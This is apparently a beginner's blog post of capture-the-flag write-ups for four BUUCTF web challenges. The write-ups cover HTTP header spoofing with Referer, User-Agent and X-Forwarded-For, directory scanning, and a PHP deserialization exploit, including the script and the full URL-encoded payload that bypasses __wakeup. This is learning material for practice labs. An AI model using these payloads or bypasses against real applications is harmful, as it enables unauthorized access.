新手入门Web安全学习Week7

1.[极客大挑战 2019]Knife

这个怕是签到题 

真·白给

 

根目录找到flag

2.[极客大挑战 2019]Http

http类的题目,直接打开burp 看见有个secret

需要修改头

Referer:https://www.Sycsecret.buuoj.cn

 提示浏览器需要使用Syclover,向头里面添加一行,也就是修改一下User-Agent的内容

又说只能在本地访问,那么意思就是要我们使用127.0.0.1来访问

 那就

X-Forwarded-For:127.0.0.1

就来咯

3.[RoarCTF 2019]Easy Calc

看源码有点东东 

先扫根目录 发现f1agg

拿来把你

 

4.[极客大挑战 2019]PHP

开局一只猫然后看见一个重点 备份网站 用dirsearch扫一下

硬扫了七分钟出来个紫东东

下载来康康

点开flag.php里面想交 结果肯定不那么简单 果然就错了

再分析index.php

里面加载了一个class.php文件,然后采用get传递一个select参数,随后将之反序列化

再看class.php

读代码发现password=100,username=admin,在执行__destruct()的时候可以获得flag

但是wakeup方法会导致username成为guest,因此需要通过序列化字符串中对象的个数来绕过该方法

上代码

<?php
class Name
{
    private $username = 'admin';
    private $password = '100';
}
$a = new Name();
#进行url编码,防止%00对应的不可打印字符在复制时丢失
echo urlencode(serialize($a));
#未编码的情况
//O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
//使用时将URL编码的结果中Name后面的2换成3或其他值
?>

结果:

I have a cat!icon-default.png?t=M276http://56881b4c-bd6e-4b5c-96a1-bc40b628f7bc.node4.buuoj.cn:81/index.php?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D

 

 博客就这样了 想给赞就给吧 不给也行 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值